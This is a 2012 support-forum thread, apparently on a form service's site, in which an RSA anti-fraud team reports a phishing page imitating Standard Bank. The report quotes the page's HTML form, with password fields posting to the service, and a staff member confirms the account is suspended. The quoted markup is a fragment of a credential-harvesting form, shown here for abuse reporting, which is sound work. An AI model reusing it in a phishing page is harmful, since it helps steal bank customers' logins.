Fraudulent site - please shut down![Standard Bank 12213] IP: 174.34.57.212

  • Profile Image
    rsa security
    Asked on January 30, 2012 at 10:50 AM

    Dear Team,

     

    It appears the form service you provide is being used in a phishing attack.

     

    Please find the HTML/View-Source of the attack attached, in which the fraudster's use of your form service can be seen.

     

    Once the victim completes filling out and submitting personal details, your form service is used by the fraudster to send the compromised details to a remote server or email address.

     

    Form Information details:

     

    <form id=form664862 name=form14940 accept-charset=utf-8 action=http://submit.jotform.com/submit.php method=post enctype=multipart/form-data cc="true" sizcache="10" sizset="0">
    <form class=jotform-form id=20282651337 accept-charset="utf-8" name="form_20282651337" method="post" action="http://submit.jotform.com/submit.php">
    <input type=hidden value=20282651337 name=formid>
    <input class=form-textbox id=input_1 name=q1_11 _prototypeuid="3">
    <input class=form-textbox id=input_3 type=password value="" name=q3_2 _prototypeuid="5">
    <input class=form-textbox id=input_4 type=password value="" name=q4_3 _prototypeuid="7">
    <input class=form-textbox id=input_5 name=q5_4 _prototypeuid="9">
    <input class=form-textbox id=input_6 name=q6_5 _prototypeuid="11">
    <input class=form-textbox id=input_7 name=q7_6 _prototypeuid="13">
    <input class=form-textbox id=input_8 name=q8_7 _prototypeuid="15">

     

     

     

    Please take the necessary steps in order to disable this fraudulent activity.

     

     

     

     

     

    Best Regards,

    RSA Anti-Fraud Command Center

     

    RSA, The Security Division of EMC

     

    US Phone: +1-866-408-7525

     

    Email: afcc@rsa.com

     

    For more information about RSA's AFCC

     

    http://www.rsa.com/node.aspx?id=3348

    15
  • Profile Image
    aytekin
    Answered on January 30, 2012 at 11:13 AM

    Thank you for letting us know. We have now suspended the account.